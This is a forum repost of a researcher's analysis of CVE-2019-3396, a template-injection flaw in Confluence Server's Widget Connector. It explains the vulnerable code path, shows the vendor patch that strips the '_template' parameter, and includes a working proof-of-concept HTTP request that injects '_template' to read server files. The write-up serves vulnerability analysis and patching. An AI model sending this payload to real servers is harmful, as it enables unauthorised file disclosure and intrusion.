Jump to content
Nytro

[CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

发表于 2019-04-06 | 分类于 Web Security | 阅读次数 1141

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

1.jpg?raw=true

Analysis

According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height.

2.png?raw=true

the Widget Connector has defind some renders. for example the FriendFeedRenderer: 


 
public class FriendFeedRenderer implements WidgetRenderer
{
...
 
public String getEmbeddedHtml(String url, Map<String, String> params) {
params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
return this.velocityRenderService.render(getEmbedUrl(url), params);
}
}

 

In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map.

However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly
3.png?raw=true

So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render

4.png?raw=true

Reproduce 


 
POST /rest/tinymce/1/macro/preview HTTP/1.1
 
{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

5.jpg

Patch

in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this: 


 
public class WidgetMacro
extends BaseMacro
implements Macro, EditorImagePlaceholder
{
public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
{
...
this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
}
 
...
 
public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
...
doSanitizeParameters(parameters);
 
return this.renderManager.getEmbeddedHtml(url, parameters);
}
 
private void doSanitizeParameters(Map<String, String> parameters)
{
Objects.requireNonNull(parameters);
for (String sanitizedParameter : this.sanitizeFields) {
parameters.remove(sanitizedParameter);
}
}
}

 

 
点击赞赏二维码,您的支持将鼓励我继续创作!

Sursa: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...